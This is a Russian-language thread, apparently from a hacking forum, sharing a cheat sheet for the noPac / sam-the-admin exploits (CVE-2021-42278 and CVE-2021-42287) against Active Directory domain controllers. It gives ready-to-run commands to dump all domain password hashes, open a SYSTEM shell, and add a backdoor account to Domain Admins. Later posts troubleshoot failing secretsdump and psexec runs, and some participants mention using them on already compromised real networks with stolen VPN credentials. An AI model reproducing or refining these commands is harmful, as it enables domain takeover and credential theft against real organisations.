Remote Sam-the-Admin CVE-2021-42278 - Name impersonation + CVE-2021-42287 - KDC bamboozling

[pstdocx]

Уже не новая но стоящая внимания цвешка https://medium.com/@mvelazco/huntin...-domain-controller-impersonation-f704513c8a45

Мой краткий читщит по которому я поднимался ею в тест лабе))) кстати успешно

1. L34Rn

    #https://github.com/L34Rn/noPac-1
    #настраиваем
    $ sudo apt-get update
    $ sudo apt install python3-pip
    $ pip3 install -r requirements.txt
    #Сканирует на уязвимости, там где меньше Ticket size там уязвимо
    $ python3 scanner.py domain.local/username:'Password' -dc-ip 10.10.10.10
    # дампим все креды [-use-ldap опциональный параметр]
    $ python3 noPac.py domain.local/username:'Password' -dc-ip 10.10.10.10 -dc-host dc01 --impersonate administrator -dump [-use-ldap]
    # получаем шел [-use-ldap опциональный параметр]
    $ python3 noPac.py domain.local/username:'Password' -dc-ip 10.10.10.10 -dc-host dc01 --impersonate administrator -shell [-use-ldap]

2. WazeHell

    # скачиваем на kali linux https://github.com/WazeHell/sam-the-admin
    # разархивируем и переходим в папку
    $ cd sam-the-admin
    # устанавливаем зависимости
    $ pip3 install -r requirements.txt
    # запускаем експлойт
    # дампаем хеш 
    $ python3 sam_the_admin.py "domain.local/username:Password123" -dc-ip 10.10.10.10 -dc-host DC01 -dump -just-dc-user domain.local/Administrator
    # или получаем shell, потом добавляем локал админа
    $ python3 sam_the_admin.py "domain.local/UserName:Password123" -dc-ip 10.10.10.10 -dc-host DC01 -shell
    # C:\windows\
    system32\> net user /add privetkakdela Password321
    system32\> net localgroup administrators privetkakdela /add
    system32\> net group "domain admins" privetkakdela /add

Если получаем ошибку {
[-] Error getting TGT, Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Get TGT wrong!
}
# открываем файл в редакторе
$ sudo nano /etc/systemd/timesyncd.conf
# раскоментм строчку ntp и вписываем туда айпишник дк
[Time]
NTP=dom.contr.ip.ad
FallbackNTP=ntp.ubuntu.com pool.ntp.org
# ctrl+o -> enter -> ctrl+x
$ sudo systemctl restart systemd-timesyncd
# если ошибка
$ sudo apt update
$ sudo apt install ntpdate
$ sudo ntpdate dom.contr.ip.ad
# теперь ошибки не будет

 

[ibenji]

domain.local/username:'Password', имеется ввиду любые креды домена, или администратора? подскажи пожалуйста

любые валидные креды домена
зы: эксп от WazeHell мне показался более удобным . L34Rn почему то криво срабатывает

 

[pstdocx]

domain.local/username:'Password', имеется ввиду любые креды домена, или администратора? подскажи пожалуйста

Если бы у нас были креды администратора, мы бы ничего не эксплуатировали =)
нужны любые валидные доменные креды, какого нибудь domain\john.dou будет достаточно

любые валидные креды домена
зы: эксп от WazeHell мне показался более удобным . L34Rn почему то криво срабатывает

Полностью согласен, указал L34Rn первым так как там есть сканер
Кстати а что именно криво? Побольше конкретики пожалуйста

 

[Satyr]

[*] Impersonating test.misah
[*] Requesting S4U2self
[*] Saving ticket in test.misah.ccache
[*] You can deploy a shell when you want using the following command:
[$] KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local'

┌──(administrator㉿root)-[~/sam-the-admin]
└─$ KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

подскажите че не там делаю?

KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local' -just-dc-user test.misah
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

-just-dc-user и -use-vss не срабатывают для теста брал уже раскрытую сетку компы в доменной группе создает но это ничего не приносит

└─$ KRB5CCNAME='test.misah_ess-ore-dc-001.essa.local.ccache' /usr/bin/impacket-psexec -target-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

пробовал и через smbexec и через psexec вывод такой

Тестировал на уже раскрытой сетке создает только компы доменной группе с названиями но не эксплуатирует помогите разобраться

З.Ы. Думаю сэкономит время остальным

Ответ автора:

точно такая же проблема
я проексплуатировал и потом получил шел, но потом меня выкинуло, и я начал получать такую же ошибку как у тебя, кстати сильно много не юзай уязвимость потому что максимум можно создать 10 тачек, при експлуатации тебе выдается файлик ..ccache вот с ним можно еще через мимик или рубеус попробовать атаковать, типа ты импортируешь кеш через атаку path-the-cache и тогда полуаешь токен, после чего можно сделать будет дамп хешей с дк

 

[Alexandr7]

sudo python3 secretsdump.py -no-pass -just-dc

 

[Alexandr7]

Или так пробовать sudo impacket-secretsdump -no-pass -just-dc
sudo python3 secretsdump.py -no-pass -just-dc - вот так почти всегда срабатывает

 

[ibenji]

Кстати а что именно криво? Побольше конкретики пожалуйста

постоянно пишет что неверное имя хоста , хотя я юзал разные варианты, поэтому нашел для себя другой эксп

 

[Alexandr7]

[*] Selected Target dcsrv01.domain.local
list index out of range и всё. Юзер доменный. WazeHell использую. Хде я накосячил?

 

[Alexandr7]

Кстати в WazeHell указывать надо не просто имя хоста пример dcsrv01, а он сам поправляет. dcsrv01.ebm.local

 

[Dropbear]

Аналоги зерологона бы. Я бы и купил. Если даже креды от впн-а в этот эксп суешь, то не пробьешь нифига, даже если сервер не пропатчен. Надо чтобы у юзера доступ на сервак был в домене, тогда креды сработают

 

[pstdocx]

п

[*] Impersonating test.misah
[*] Requesting S4U2self
[*] Saving ticket in test.misah.ccache
[*] You can deploy a shell when you want using the following command:
[$] KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local'

┌──(administrator㉿root)-[~/sam-the-admin]
└─$ KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

подскажите че не там делаю?

KRB5CCNAME='test.misah.ccache' /usr/bin/impacket-secretsdump -target-ip 192.168.10.11 -dc-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local' -just-dc-user test.misah
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

-just-dc-user и -use-vss не срабатывают для теста брал уже раскрытую сетку компы в доменной группе создает но это ничего не приносит

└─$ KRB5CCNAME='test.misah_ess-ore-dc-001.essa.local.ccache' /usr/bin/impacket-psexec -target-ip 192.168.10.11 -k -no-pass @'ess-ore-dc-001.essa.local'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

пробовал и через smbexec и через psexec вывод такой

Тестировал на уже раскрытой сетке создает только компы доменной группе с названиями но не эксплуатирует помогите разобраться

З.Ы. Думаю сэкономит время остальным

Ответ автора:

точно такая же проблема
я проексплуатировал и потом получил шел, но потом меня выкинуло, и я начал получать такую же ошибку как у тебя, кстати сильно много не юзай уязвимость потому что максимум можно создать 10 тачек, при експлуатации тебе выдается файлик ..ccache вот с ним можно еще через мимик или рубеус попробовать атаковать, типа ты импортируешь кеш через атаку path-the-cache и тогда полуаешь токен, после чего можно сделать будет дамп хешей с дк

помогает если убрать -just-dc-user
вот валидная команда для дампа, тестил 5 мин назад

python3 noPac.py domain.local/username:'Password' -dc-ip 10.10.10.10 -dc-host dc01 --impersonate administrator -dump -use-ldap

 

[pstdocx]

постоянно пишет что неверное имя хоста , хотя я юзал разные варианты, поэтому нашел для себя другой эксп

другой експ это какой?

 

[ibenji]

другой експ это какой?

от него WazeHell

 

[coree]

Если у кого то что то не работает, можно попробовать по этой статье. Рекомендуется для ознакомления с уязвимость в полу-автоматическом режиме.

 

[pstdocx]

Аналоги зерологона бы. Я бы и купил. Если даже креды от впн-а в этот эксп суешь, то не пробьешь нифига, даже если сервер не пропатчен. Надо чтобы у юзера доступ на сервак был в домене, тогда креды сработают

почти всегда креды от впна = креды ад

 

[ibenji]

как решить данну траблу ? -use-vss не помогает, это тоже

python3 noPac.py domain.local/username:'Password' -dc-ip 10.10.10.10 -dc-host dc01 --impersonate administrator -dump -use-ldap

└─# KRB5CCNAME='admin.ccache' /usr/bin/impacket-secretsdump -target-ip 192.x.x.x -dc-ip 192.x.x.x -k -no-pass @'dc.domain.local' -just-dc-user 'dc\administrator'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

 

[pstdocx]

как решить данну траблу ? -use-vss не помогает, это тоже


└─# KRB5CCNAME='admin.ccache' /usr/bin/impacket-secretsdump -target-ip 192.x.x.x -dc-ip 192.x.x.x -k -no-pass @'dc.domain.local' -just-dc-user 'dc\administrator'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_MODIFIED(Message stream modified)
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

python3 noPac.py domain.local/username:'Password' -dc-ip 10.10.10.10 -dc-host dc01 --impersonate administrator -dump -use-ldap
должна дампить, попробуй еще указать -dc-host в фкдн, и еще мне помогло убрать -just-dc-user 'dc\administrator' ключ, без него дампится все а не конкретный пользак и ошибки нету

вывод полный скинь, попробую помочь

 

[ibenji]

python3 noPac.py domain.local/username:'Password' -dc-ip 10.10.10.10 -dc-host dc01 --impersonate administrator -dump -use-ldap
должна дампить, попробуй еще указать -dc-host в фкдн, и еще мне помогло убрать -just-dc-user 'dc\administrator' ключ, без него дампится все а не конкретный пользак и ошибки нету

вывод полный скинь, попробую помочь

делал как ты писал выше, если пишу -use-ldap без -just-dc-user ,то пишет что попробуйте через just-dc-user. хост я указывал по разному, если запускать другой эксп от WazeHell , то пишет list index out of range или как то так, но не на всех доменах, как будут попадаться подобные ошибки скину сюда

 

[ibenji]

попробую помочь

квота 10 , другие дц пробовал пишет что пропатчено, нашел эти, но типа не хватает прав, раньше тоже такое было но другой эксп пробивал
─# python3 sam_the_admin.py domain/user:'pass' -dc-ip 10.1.x.x -shell
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] WARNING: Target host is not a DC
[*] Selected Target dc.domain.local
[*] Total Domain Admins 26
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-80$"
[*] MachineAccount "SAMTHEADMIN-80$" password = g&&dNlxhYa5Y
[-] User svc.vpn doesn't have right to create a machine account!
[-] Machine not found in LDAP: SAMTHEADMIN-80$
Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)



─# python3 noPac.py domain/user:'pass' -dc-ip 10.1.x.x --impersonate administrator -dump -use-ldap




[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: dc1
[*] 1: dc2
>>> Your choice: 0
[*] Selected Target dc.domain.local
[*] will try to impersonat administrator
[*] Adding Computer Account "WIN-ANUD4DPS3BN"
[*] MachineAccount "WIN-ANUD4DPS3BN" password = WF0CGei8EH*l
[-] User svc.vpn doesn't have right to create a machine account!

 

[pstdocx]

Скрытое содержимое

1. квота 10 - значит что один пользователь может создать до 10 машин в домене
2. твой пользователь не может добавлять машины, что странно ибо все доменные пользователи имеют на это право
3. когда не уязвимо другую ошибку выдает, обычно...